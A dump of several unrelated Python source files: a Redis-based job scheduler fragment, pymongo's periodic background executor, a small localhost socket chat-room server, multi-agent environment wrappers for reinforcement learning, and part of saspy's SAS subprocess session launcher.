# The connection keyword arguments are obtained from
# `UnixDomainSocketConnection`, which expects `path`, but passed to
# `redis.client.Redis`, which expects `unix_socket_path`, renaming
# the key is necessary.
# `path` is not left in the dictionary as that keyword argument is
# not expected by `redis.client.Redis` and would raise an exception.
self._connection_kwargs['unix_socket_path'] = self._connection_kwargs.pop(
'path'
)
self._connection = None
self.interval = interval
self._stop_requested = False
self._status = self.Status.STOPPED
self._process = None
self.log = logging.getLogger(__name__)
setup_loghandlers(
level=logging_level,
name=__name__,
log_format=log_format,
date_format=date_format,
)
@property
def connection(self):
if self._connection:
return self._connection
self._connection = self._connection_class(**self._connection_kwargs)
return self._connection
@property
def acquired_locks(self):
return self._acquired_locks
@property
def status(self):
return self._status
@property
def should_reacquire_locks(self):
"""Returns True if lock_acquisition_time is longer than 10 minutes ago"""
if self._queue_names == self.acquired_locks:
return False
if not self.lock_acquisition_time:
return True
return (datetime.now() - self.lock_acquisition_time).total_seconds() > 600
def acquire_locks(self, auto_start=False):
"""Returns names of queue it successfully acquires lock on"""
successful_locks = set()
pid = os.getpid()
self.log.info("Trying to acquire locks for %s", ", ".join(self._queue_names))
for name in self._queue_names:
if self.connection.set(self.get_locking_key(name), pid, nx=True, ex=60):
successful_locks.add(name)
# Always reset _scheduled_job_registries when acquiring locks
self._scheduled_job_registries = []
self._acquired_locks = self._acquired_locks.union(successful_locks)
self.lock_acquisition_time = datetime.now()
# If auto_start is requested and scheduler is not started,
# run self.start()
if self._acquired_locks and auto_start:
if not self._process:
self.start()
return successful_locks
def prepare_registries(self, queue_names=None):
"""Prepare scheduled job registries for use"""
self._scheduled_job_registries = []
if not queue_names:
queue_names = self._acquired_locks
for name in queue_names:
self._scheduled_job_registries.append(
ScheduledJobRegistry(name, connection=self.connection)
)
@classmethod
def get_locking_key(cls, name):
"""Returns scheduler key for a given queue name"""
return SCHEDULER_LOCKING_KEY_TEMPLATE % name
def enqueue_scheduled_jobs(self):
"""Enqueue jobs whose timestamp is in the past"""
self._status = self.Status.WORKING
if not self._scheduled_job_registries and self._acquired_locks:
self.prepare_registries()
for registry in self._scheduled_job_registries:
timestamp = current_timestamp()
# TODO: try to use Lua script to make get_jobs_to_schedule()
# and remove_jobs() atomic
job_ids = registry.get_jobs_to_schedule(timestamp)
if not job_ids:
continue
queue = Queue(registry.name, connection=self.connection)
with self.connection.pipeline() as pipeline:
jobs = Job.fetch_many(job_ids, connection=self.connection)
for job in jobs:
if job is not None:
queue.enqueue_job(job, pipeline=pipeline)
registry.remove(job, pipeline=pipeline)
pipeline.execute()
self._status = self.Status.STARTED
def _install_signal_handlers(self):
"""Installs signal handlers for handling SIGINT and SIGTERM
gracefully.
"""
signal.signal(signal.SIGINT, self.request_stop)
signal.signal(signal.SIGTERM, self.request_stop)
def request_stop(self, signum=None, frame=None):
"""Toggle self._stop_requested that's checked on every loop"""
self._stop_requested = True
def heartbeat(self):
"""Updates the TTL on scheduler keys and the locks"""
self.log.debug("Scheduler sending heartbeat to %s",
", ".join(self.acquired_locks))
if len(self._queue_names) > 1:
with self.connection.pipeline() as pipeline:
for name in self._queue_names:
key = self.get_locking_key(name)
pipeline.expire(key, self.interval + 5)
pipeline.execute()
else:
key = self.get_locking_key(next(iter(self._queue_names)))
self.connection.expire(key, self.interval + 5)
def stop(self):
self.log.info("Scheduler stopping, releasing locks for %s...",
','.join(self._queue_names))
self.release_locks()
self._status = self.Status.STOPPED
def release_locks(self):
"""Release acquired locks"""
keys = [self.get_locking_key(name) for name in self._queue_names]
self.connection.delete(*keys)
self._acquired_locks = set()
def start(self):
self._status = self.Status.STARTED
# Redis instance can't be pickled across processes so we need to
# clean this up before forking
self._connection = None
self._process = Process(target=run, args=(self,), name='Scheduler')
self._process.start()
return self._process
def work(self):
self._install_signal_handlers()
while True:
if self._stop_requested:
self.stop()
break
if self.should_reacquire_locks:
self.acquire_locks()
self.enqueue_scheduled_jobs()
self.heartbeat()
time.sleep(self.interval)
def run(scheduler):
    """Entry point of the scheduler's child process.

    Logs start and stop, runs the scheduler's work loop, and makes sure any
    exception escaping the loop is logged with a traceback before it
    propagates.
    """
    pid = os.getpid()
    scheduler.log.info("Scheduler for %s started with PID %s",
                       ','.join(scheduler._queue_names), pid)
    try:
        scheduler.work()
    except:  # noqa
        scheduler.log.error(
            'Scheduler [PID %s] raised an exception.\n%s',
            pid, traceback.format_exc()
        )
        raise
    scheduler.log.info("Scheduler with PID %s has stopped", pid)
def parse_names(queues_or_names):
    """Given a list of strings or queues, returns queue names"""
    return [
        item.name if isinstance(item, Queue) else str(item)
        for item in queues_or_names
    ]
|
periodic_executor.py | # Copyright 2014-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Run a target function on a background thread."""
import atexit
import threading
import time
import weakref
from pymongo.monotonic import time as _time
class PeriodicExecutor(object):
    """Calls a target function on a daemon thread, once per interval."""
    def __init__(self, interval, min_interval, target, name=None):
        """Run a target function periodically on a background thread.
        If the target's return value is false, the executor stops.
        :Parameters:
          - `interval`: Seconds between calls to `target`.
          - `min_interval`: Minimum seconds between calls if `wake` is
            called very often.
          - `target`: A function.
          - `name`: A name to give the underlying thread.
        """
        # threading.Event and its internal condition variable are expensive
        # in Python 2, see PYTHON-983. Use a boolean to know when to wake.
        # The executor's design is constrained by several Python issues, see
        # "periodic_executor.rst" in this repository.
        self._event = False
        self._interval = interval
        self._min_interval = min_interval
        self._target = target
        self._stopped = False
        self._thread = None
        self._name = name
    def open(self):
        """Start. Multiple calls have no effect.
        Not safe to call from multiple threads at once.
        """
        self._stopped = False
        started = False
        try:
            started = self._thread and self._thread.is_alive()
        except ReferenceError:
            # Thread terminated.
            pass
        if not started:
            thread = threading.Thread(target=self._run, name=self._name)
            thread.daemon = True
            # Hold only a weak proxy: the executor must not keep its own
            # thread (and therefore itself) alive; see module comment below.
            self._thread = weakref.proxy(thread)
            _register_executor(self)
            thread.start()
    def close(self, dummy=None):
        """Stop. To restart, call open().
        The dummy parameter allows an executor's close method to be a weakref
        callback; see monitor.py.
        """
        # Just flag the loop; _run observes the flag on its next iteration.
        self._stopped = True
    def join(self, timeout=None):
        """Wait up to `timeout` seconds for the background thread to exit."""
        if self._thread is not None:
            try:
                self._thread.join(timeout)
            except (ReferenceError, RuntimeError):
                # Thread already terminated, or not yet started.
                pass
    def wake(self):
        """Execute the target function soon."""
        self._event = True
    def _run(self):
        # Thread body: call target, then sleep in min_interval slices so a
        # wake() call is noticed quickly.
        while not self._stopped:
            try:
                if not self._target():
                    self._stopped = True
                    break
            except:
                self._stopped = True
                raise
            deadline = _time() + self._interval
            while not self._stopped and _time() < deadline:
                time.sleep(self._min_interval)
                if self._event:
                    break  # Early wake.
            self._event = False
# _EXECUTORS has a weakref to each running PeriodicExecutor. Once started,
# an executor is kept alive by a strong reference from its thread and perhaps
# from other objects. When the thread dies and all other referrers are freed,
# the executor is freed and removed from _EXECUTORS. If any threads are
# running when the interpreter begins to shut down, we try to halt and join
# them to avoid spurious errors.
_EXECUTORS = set()
def _register_executor(executor):
    """Track *executor* in the module registry via a weak reference.

    The callback removes the entry automatically once the executor is freed.
    """
    _EXECUTORS.add(weakref.ref(executor, _on_executor_deleted))
def _on_executor_deleted(ref):
    """Weakref callback: drop a dead executor's reference from the registry.

    Uses discard() rather than remove(): if the callback fires after the
    registry has been torn down or the entry was already dropped (e.g. during
    interpreter shutdown), remove() would raise KeyError, which Python prints
    to stderr from inside a weakref callback.
    """
    _EXECUTORS.discard(ref)
def _shutdown_executors():
    """atexit hook: ask every live executor to stop, then briefly join each."""
    if _EXECUTORS is None:
        return
    # Work on a snapshot: stopping threads mutates the registry.
    refs = list(_EXECUTORS)
    # First signal all executors to close...
    for ref in refs:
        target = ref()
        if target:
            target.close()
    # ...then try to join them, one second each.
    for ref in refs:
        target = ref()
        if target:
            target.join(1)
    target = None
atexit.register(_shutdown_executors)
|
SERVER.py | import socket
import threading
import pyfiglet
from pyfiglet import Figlet
import os
#clear screen
os.system('cls' if os.name == 'nt' else 'clear')
#aTAG LINE
print('''\033[5;31;40m
_____ _____
__| _ |__ ____ _ _____ ______ _____ __| _ |__ _____ _____ _____ ____ ______
| | | | || \ | || \ | ___|| | | |_| | |/ \/ \| \ | || ___|
| |_| | || \| || \| ___|| \ | _ | || || || \| || ___|
|______| __||__/\____||______/|______||__|\__\|__| |_| __|\_____/\_____/|______/|____||______|
|_____| |_____|
\033[0;34;40m
\033[5;34;40m
______ _______
.' ___ ||_ __ \
______ / .' \_| | |__) | SERVER*
|______|| | | __ /
\ `.___.'\ _| | \ \_
`.____ .'|____| |___| v.BETA
\033[0;31;40m
\033[1;32;40m
-OJASWA RHX V.01 (2021)
#YOUR OWN PRIVATE CHAT ROOMS
\033[0;37;40m
''')
#DATA
host="127.0.0.1"
#assign name to server
port=int(input("\033[0;32;40m Enter A Free Port [4444,1500,1604,1716] : \033[0;35;40m"))
servername= (input("\033[0;32;40m ENTER THE SERVER NAME : \033[0;35;40m"))
from pyfiglet import Figlet
rectanglefont = Figlet(font='rectangles')
#delete above
os.system('cls' if os.name == 'nt' else 'clear')
print(rectanglefont.renderText(servername)+"\033[0;32;40m SERVER STARTED \033[5;32;40m \033[0;37;40m")
#server startup
server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((host,port))
cport=server.getsockname()[1]
print(f"\033[2;32;40m Socket created using [Port] : {cport}\n")
server.listen()
print(f"Start dynamic IP using [ngrok tcp {port}] \033[0;37;40m\n")
#Clients & Names
clients=[]
names=[]
print("\033[5;31;40m LISTENING.....\033[0;31;40m\n")
#function to send messges to all connected clients
def broadcast(message):
    """Relay *message* (bytes) to every connected client socket."""
    for peer in clients:
        peer.send(message)
#function to handling connected clients over network
def handle(client):
    """Per-client thread: relay everything the client sends to all clients.

    Any error on the socket is treated as a disconnect: the client is removed
    from the shared lists, its departure is broadcast, and the thread exits.
    """
    while True:
        try:
            # Forward the raw message to every connected client.
            message=client.recv(1024)
            broadcast(message)
        except:
            # Client disconnected (the bare except also swallows any other
            # error -- NOTE(review): confirm that is intended).
            # `clients` and `names` are parallel lists; look the name up by
            # the client's index before removing either entry.
            index=clients.index(client)
            clients.remove(client)
            client.close()
            name=names[index]
            broadcast('\033[1;35;40m {} \033[5;31;40m left! \033[0;31;40m'.format(name).encode('ascii'))
            print(f"\033[1;35;40m {name} \033[5;34;40m LEFT SERVER! \033[0;34;40m")
            names.remove(name)
            break
#recieving /listening adding clients
def receive():
    """Accept loop: greet each new client, record it, spawn its handler thread."""
    while True:
        # Block until the next client connects.
        client,address=server.accept()
        print(f"\033[1;33;40m Connected with {str(address)}\033[0;37;40m")
        # "HOODIE" is the handshake token; the client presumably answers it
        # with its display name (confirm against the client script).
        client.send("HOODIE".encode("ascii"))
        name=client.recv(1024).decode("ascii")
        names.append(name)
        clients.append(client)
        # Announce the arrival to everyone and welcome the newcomer.
        print(f"\033[1;31;40m {name} \033[0;37;40m \033[5;31;40m CONNECTED ! \033[0;31;40m")
        broadcast("\033[1;33;40m {} joined !\033[2;32;40m".format(name).encode('ascii'))
        client.send("\033[5;31;40m Connected to server! \033[0;31;40m \033[0;37;40m ".encode("ascii"))
        client.send(rectanglefont.renderText(servername).encode("ascii"))
        client.send("Ctrl+C/Z/X To leave the server ! ".encode("ascii"))
        # One handler thread per client.
        thread=threading.Thread(target=handle,args=(client,))
        thread.start()
receive()
|
env_wrappers.py | """
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
    """Subprocess loop: build the env and serve commands arriving on *remote*.

    Commands are (name, payload) tuples; the loop runs until 'close'.
    """
    # The parent's pipe end is useless in the child -- close it.
    parent_remote.close()
    env = env_fn_wrapper.x()
    while True:
        cmd, data = remote.recv()
        if cmd == 'step':
            ob, reward, done, info = env.step(data)
            # Auto-reset once every agent in this env is done.
            if all(done):
                ob = env.reset()
            remote.send((ob, reward, done, info))
        elif cmd == 'reset':
            remote.send(env.reset())
        elif cmd == 'reset_task':
            remote.send(env.reset_task())
        elif cmd == 'close':
            remote.close()
            break
        elif cmd == 'get_spaces':
            remote.send((env.observation_space, env.action_space))
        elif cmd == 'get_agent_types':
            try:
                agents = env.agents
                if all(hasattr(agent, 'adversary') for agent in agents):
                    types = ['adversary' if agent.adversary else 'agent'
                             for agent in agents]
                else:
                    types = ['agent' for _ in agents]
            except AttributeError:
                # Env without an `agents` list: report one type per env.n.
                types = ['agent' for _ in range(env.n)]
            remote.send(types)
        else:
            raise NotImplementedError
class SubprocVecEnv(VecEnv):
    """Vectorized env running each sub-environment in its own process.

    Communicates with the `worker` loops over multiprocessing Pipes using a
    simple (command, payload) protocol.
    """
    def __init__(self, env_fns, spaces=None):
        """
        envs: list of gym environments to run in subprocesses
        """
        self.waiting = False
        self.closed = False
        nenvs = len(env_fns)
        # One pipe per env: remotes stay here, work_remotes go to workers.
        self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
        self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
                   for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
        for p in self.ps:
            p.daemon = True  # if the main process crashes, we should not cause things to hang
            p.start()
        # Close this process's copies of the worker ends.
        for remote in self.work_remotes:
            remote.close()
        # Query one worker for the shared spaces and agent types.
        self.remotes[0].send(('get_spaces', None))
        observation_space, action_space = self.remotes[0].recv()
        self.remotes[0].send(('get_agent_types', None))
        self.agent_types = self.remotes[0].recv()
        VecEnv.__init__(self, len(env_fns), observation_space, action_space)
    def step_async(self, actions):
        """Dispatch one action per worker without waiting for results."""
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        self.waiting = True
    def step_wait(self):
        """Collect the results of the previous step_async call."""
        results = [remote.recv() for remote in self.remotes]
        self.waiting = False
        obs, rews, dones, infos = zip(*results)
        return np.stack(obs), np.stack(rews), np.stack(dones), infos
    def reset(self):
        """Reset every sub-environment and stack the initial observations."""
        for remote in self.remotes:
            remote.send(('reset', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def reset_task(self):
        for remote in self.remotes:
            remote.send(('reset_task', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def close(self):
        """Shut down workers; drains pending step results first if needed."""
        if self.closed:
            return
        if self.waiting:
            for remote in self.remotes:
                remote.recv()
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()
        self.closed = True
class DummyVecEnv(VecEnv):
    """In-process vectorized env: steps each sub-environment sequentially."""
    def __init__(self, env_fns):
        self.envs = [fn() for fn in env_fns]
        env = self.envs[0]
        VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
        try:
            # Multi-agent envs expose `agents`; classify each as adversary/agent.
            if all([hasattr(a, 'adversary') for a in env.agents]):
                self.agent_types = ['adversary' if a.adversary else 'agent' for a in
                                    env.agents]
            else:
                self.agent_types = ['agent' for _ in env.agents]
        except AttributeError:
            # No `agents` attribute: fall back to one type per env.n.
            self.agent_types = ['agent' for _ in range(env.n)]
        # Per-env step counters, reset whenever the env auto-resets.
        self.ts = np.zeros(len(self.envs), dtype='int')
        self.actions = None
    def step_async(self, actions):
        # Nothing is actually asynchronous here; just stash the actions.
        self.actions = actions
    def step_wait(self):
        results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
        obs, rews, dones, infos = map(np.array, zip(*results))
        self.ts += 1
        for (i, done) in enumerate(dones):
            # Auto-reset an env once all of its agents are done.
            if all(done):
                obs[i] = self.envs[i].reset()
                self.ts[i] = 0
        self.actions = None
        return np.array(obs), np.array(rews), np.array(dones), infos
    def reset(self):
        results = [env.reset() for env in self.envs]
        return np.array(results)
def close(self):
return |
sasiostdio.py | #
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
if os.name != 'nt':
import fcntl
import signal
import subprocess
import tempfile as tf
from time import sleep
import socket as socks
import codecs
import select as sel
import warnings
import io
try:
import pandas as pd
import numpy as np
except ImportError:
pass
if os.name == 'nt':
from queue import Queue, Empty
from threading import Thread
class SASconfigSTDIO:
    """
    This object is not intended to be used directly. Instantiate a SASsession object instead
    """
    def __init__(self, session, **kwargs):
        # Resolve the effective STDIO configuration: values come from the
        # named config in sascfg_personal.py, each optionally overridden by a
        # kwarg unless the config file sets lock_down.
        self._kernel = kwargs.get('kernel', None)
        SAScfg = session._sb.sascfg.SAScfg
        self.name = session._sb.sascfg.name
        cfg = getattr(SAScfg, self.name)
        self.saspath = cfg.get('saspath', '')
        self.options = cfg.get('options', [])
        self.ssh = cfg.get('ssh', '')
        self.identity = cfg.get('identity', None)
        self.luser = cfg.get('luser', None)
        self.tunnel = cfg.get('tunnel', None)
        self.rtunnel = cfg.get('rtunnel', None)
        self.port = cfg.get('port', None)
        self.host = cfg.get('host', '')
        self.encoding = cfg.get('encoding', '')
        self.metapw = cfg.get('metapw', '')
        self.lrecl = cfg.get('lrecl', None)
        self.iomc = cfg.get('iomc', '')
        localhost = cfg.get('localhost', None)
        # Output format defaults to html5 if unset or invalid.
        try:
            self.outopts = getattr(SAScfg, "SAS_output_options")
            self.output = self.outopts.get('output', 'html5')
        except:
            self.output = 'html5'
        if self.output.lower() not in ['html', 'html5']:
            print("Invalid value specified for SAS_output_options. Using the default of HTML5")
            self.output = 'html5'
        # GET Config options
        try:
            self.cfgopts = getattr(SAScfg, "SAS_config_options")
        except:
            self.cfgopts = {}
        lock = self.cfgopts.get('lock_down', True)
        # in lock down mode, don't allow runtime overrides of option values from the config file.
        self.verbose = self.cfgopts.get('verbose', True)
        self.verbose = kwargs.get('verbose', self.verbose)
        # Each override below follows the same pattern: accept the kwarg only
        # when lock_down permits it, otherwise warn that it was ignored.
        insaspath = kwargs.get('saspath', '')
        if len(insaspath) > 0:
            if lock and len(self.saspath):
                print("Parameter 'saspath' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.saspath = insaspath
        inoptions = kwargs.get('options', '')
        if len(inoptions) > 0:
            if lock and len(self.options):
                print("Parameter 'options' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.options = inoptions
        inssh = kwargs.get('ssh', '')
        if len(inssh) > 0:
            if lock and len(self.ssh):
                print("Parameter 'ssh' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.ssh = inssh
        inident = kwargs.get('identity', None)
        if inident is not None:
            if lock:
                print("Parameter 'identity' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.identity = inident
        inluser = kwargs.get('luser', None)
        if inluser is not None:
            if lock:
                print("Parameter 'luser' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.luser = inluser
        intunnel = kwargs.get('tunnel', None)
        if intunnel is not None:
            if lock:
                print("Parameter 'tunnel' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.tunnel = intunnel
        inrtunnel = kwargs.get('rtunnel', None)
        if inrtunnel is not None:
            if lock:
                print("Parameter 'rtunnel' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.rtunnel = inrtunnel
        inport = kwargs.get('port', None)
        if inport is not None:
            if lock:
                print("Parameter 'port' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.port = inport
        inloc = kwargs.get('localhost', None)
        if inloc is not None:
            if lock and localhost is not None:
                print("Parameter 'localhost' passed to SAS_session was ignored due to configuration restriction.")
            else:
                localhost = inloc
        inhost = kwargs.get('host', '')
        if len(inhost) > 0:
            if lock and len(self.host):
                print("Parameter 'host' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.host = inhost
        inencoding = kwargs.get('encoding', 'NoOverride')
        if inencoding != 'NoOverride':
            if lock and len(self.encoding):
                print("Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.encoding = inencoding
        if not self.encoding:
            self.encoding = ''  # 'utf-8'
        # Validate the encoding name; fall back to '' so it is later derived
        # from the SAS session encoding.
        if self.encoding != '':
            try:
                coinfo = codecs.lookup(self.encoding)
            except LookupError:
                print("The encoding provided ("+self.encoding+") doesn't exist in this Python session. Setting it to ''.")
                print("The correct encoding will attempt to be determined based upon the SAS session encoding.")
                self.encoding = ''
        inlrecl = kwargs.get('lrecl', None)
        if inlrecl:
            if lock and self.lrecl:
                print("Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.")
            else:
                self.lrecl = inlrecl
        if not self.lrecl:
            self.lrecl = 1048576
        self._prompt = session._sb.sascfg._prompt
        if localhost is not None:
            self.hostip = localhost
        else:
            self.hostip = socks.gethostname()
            try:
                # Best effort: resolve the local hostname via nslookup and use
                # the IP only if it reverse-resolves; otherwise keep the name.
                x = subprocess.Popen(('nslookup', self.hostip), stdout=subprocess.PIPE)
                z = x.stdout.read()
                ip = z.rpartition(b'Address:')[2].strip().decode()
                try:
                    socks.gethostbyaddr(ip)
                    self.hostip = ip
                except:
                    pass
                x.terminate()
            except:
                pass
        return
class SASsessionSTDIO():
"""
The SASsession object is the main object to instantiate and provides access to the rest of the functionality.
cfgname - value in SAS_config_names List of the sascfg_personal.py file
kernel - None - internal use when running the SAS_kernel notebook
saspath - overrides saspath Dict entry of cfgname in sascfg_personal.py file
options - overrides options Dict entry of cfgname in sascfg_personal.py file
encoding - This is the python encoding value that matches the SAS session encoding of the IOM server you are connecting to
autoexec - This is a string of SAS code that will be submitted upon establishing a connection.
ssh - full path of the ssh command; /usr/bin/ssh for instance
host - host name of the remote machine
identity - path to an .ppk identity file to be used with the ssh -i option
port - (Optional: integer) The ssh port of the remote machine (equivalent to invoking ssh with the -p option)
tunnel - (Optional: integer) Certain methods of saspy require opening a local port and accepting data streamed from the SAS instance.
"""
    #def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, saspath :str ='', options: list =[]) -> '<SASsession object>':
    def __init__(self, **kwargs):
        """Build the STDIO config from kwargs and immediately launch SAS."""
        self.pid = None
        self.stdin = None
        self.stderr = None
        self.stdout = None
        self._sb = kwargs.get('sb', None)
        self._log_cnt = 0
        self._log = ""
        self.sascfg = SASconfigSTDIO(self, **kwargs)
        self._startsas()
        return
    def __del__(self):
        # Ensure the SAS subprocess is shut down when this object is GC'd.
        if self.pid:
            self._endsas()
        self._sb.SASpid = None
    def _logcnt(self, next=True):
        """Return the log-marker counter as an 8-digit string, incrementing
        it first unless `next` is False."""
        if next == True:
            self._log_cnt += 1
        return '%08d' % self._log_cnt
    def _buildcommand(self, sascfg):
        """Build and return [program, argv] used to launch SAS.

        When sascfg.ssh is set SAS is started on the remote host via ssh
        (with optional identity, port and tunnel flags); otherwise the local
        saspath is executed directly with the STDIO options.
        """
        if sascfg.ssh:
            pgm = sascfg.ssh
            parms = [pgm]
            parms += ["-t"]
            if sascfg.identity:
                parms += ["-i", sascfg.identity]
            if sascfg.port:
                parms += ["-p", str(sascfg.port)]
            if sascfg.tunnel:
                parms += ["-R", '%d:localhost:%d' % (sascfg.tunnel,sascfg.tunnel)]
            if sascfg.rtunnel:
                parms += ["-L", '%d:localhost:%d' % (sascfg.rtunnel,sascfg.rtunnel)]
            if sascfg.luser:
                parms += [sascfg.luser+'@'+sascfg.host, sascfg.saspath]
            else:
                parms += [sascfg.host, sascfg.saspath]
            if sascfg.output.lower() == 'html':
                print("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg_personal.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the sample sascfg.py.
Will use HTML5 for this SASsession.""")
                sascfg.output = 'html5'
        else:
            pgm = sascfg.saspath
            parms = [pgm]
        # temporary hack for testing grid w/ sasgsub and iomc ...
        if sascfg.iomc:
            pgm = sascfg.iomc
            parms = [pgm]
            parms += ["user", "sas", "pw", "sas"]
            parms += ['']
        elif sascfg.metapw:
            pgm = sascfg.ssh
            parms = [pgm]
            parms += ["-t", "-i", "/u/sastpw/idrsacnn", sascfg.host]
            parms += sascfg.options
            #parms += ['"'+sascfg.saspath+' -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX"']
            parms += ['']
        else:
            parms += sascfg.options
            parms += ["-nodms"]
            parms += ["-stdio"]
            parms += ["-terminal"]
            parms += ["-nosyntaxcheck"]
            parms += ["-pagesize", "MAX"]
            parms += ['']
        return [pgm, parms]
    def _startsas(self):
        """Start the SAS subprocess and wire up stdin/stdout/stderr.

        On Windows a Popen with pipes plus reader threads is used (Windows
        pipes cannot be read non-blocking); elsewhere SAS is started via
        forkpty with explicit pipes set to O_NONBLOCK. Returns the pid (or
        Popen object on Windows), or None on failure.
        """
        if self.pid:
            return self.pid
        pgm, parms = self._buildcommand(self.sascfg)
        # Human-readable command line, used only in error messages below.
        s = ''
        for i in range(len(parms)):
            s += parms[i]+' '
        if os.name == 'nt':
            try:
                self.pid = subprocess.Popen(parms, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                pid = self.pid.pid
            except OSError as e:
                print("The OS Error was:\n"+e.strerror+'\n')
                print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
                print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
                return None
        else:
            PIPE_READ = 0
            PIPE_WRITE = 1
            pin = os.pipe()
            pout = os.pipe()
            perr = os.pipe()
            try:
                pidpty = os.forkpty()
            except:
                import pty
                pidpty = pty.fork()
            if pidpty[0]:
                # we are the parent
                pid = pidpty[0]
                os.close(pin[PIPE_READ])
                os.close(pout[PIPE_WRITE])
                os.close(perr[PIPE_WRITE])
            else:
                # we are the child: rewire fds 0/1/2 to the pipes, then exec SAS
                signal.signal(signal.SIGINT, signal.SIG_DFL)
                os.close(0)
                os.close(1)
                os.close(2)
                os.dup2(pin[PIPE_READ], 0)
                os.dup2(pout[PIPE_WRITE], 1)
                os.dup2(perr[PIPE_WRITE], 2)
                os.close(pin[PIPE_READ])
                os.close(pin[PIPE_WRITE])
                os.close(pout[PIPE_READ])
                os.close(pout[PIPE_WRITE])
                os.close(perr[PIPE_READ])
                os.close(perr[PIPE_WRITE])
                try:
                    #sleep(5)
                    os.execv(pgm, parms)
                except OSError as e:
                    print("The OS Error was:\n"+e.strerror+'\n')
                    print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
                    print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                    print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
                    os._exit(-6)
                except:
                    print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
                    os._exit(-6)
        if os.name == 'nt':
            try:
                # If wait(1) succeeds, the process already died -> report it.
                self.pid.wait(1)
                error = self.pid.stderr.read(4096).decode()+'\n'
                error += self.pid.stdout.read(4096).decode()
                print("Java Error:\n"+error)
                print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
                print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
                self.pid = None
                return None
            except:
                # lame windows can't do non-blocking I/O
                self.stdout = Queue()
                self.stderr = Queue()
                self.to = Thread(target=self._read_out, args=())
                self.te = Thread(target=self._read_err, args=())
                self.to.daemon = True
                self.te.daemon = True
                self.to.start()
                self.te.start()
                self.stdin = self.pid.stdin
        else:
            self.pid = pidpty[0]
            self.stdin = os.fdopen(pin[PIPE_WRITE], mode='wb')
            self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
            self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
            fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
            fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)
            # Non-zero waitpid result means the child already exited.
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                lst = self.stdout.read1(4096)
                print("stdout from subprocess is:\n"+lst.decode())
        if self.pid is None:
            print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
            return None
        else:
            enc = self.sascfg.encoding  # validating encoding is done next, so handle it not being set for this one call
            if enc == '':
                self.sascfg.encoding = 'utf-8'
            # Prime the session with standard options; also verifies it's alive.
            ll = self.submit("options svgtitle='svgtitle'; options validvarname=any validmemname=extend; ods graphics on;", "text")
            self.sascfg.encoding = enc
            if self.pid is None:
                print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
                print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
                return None
        if self.sascfg.verbose:
            pid = self.pid if os.name != 'nt' else self.pid.pid
            print("SAS Connection established. Subprocess id is "+str(pid)+"\n")
        return self.pid
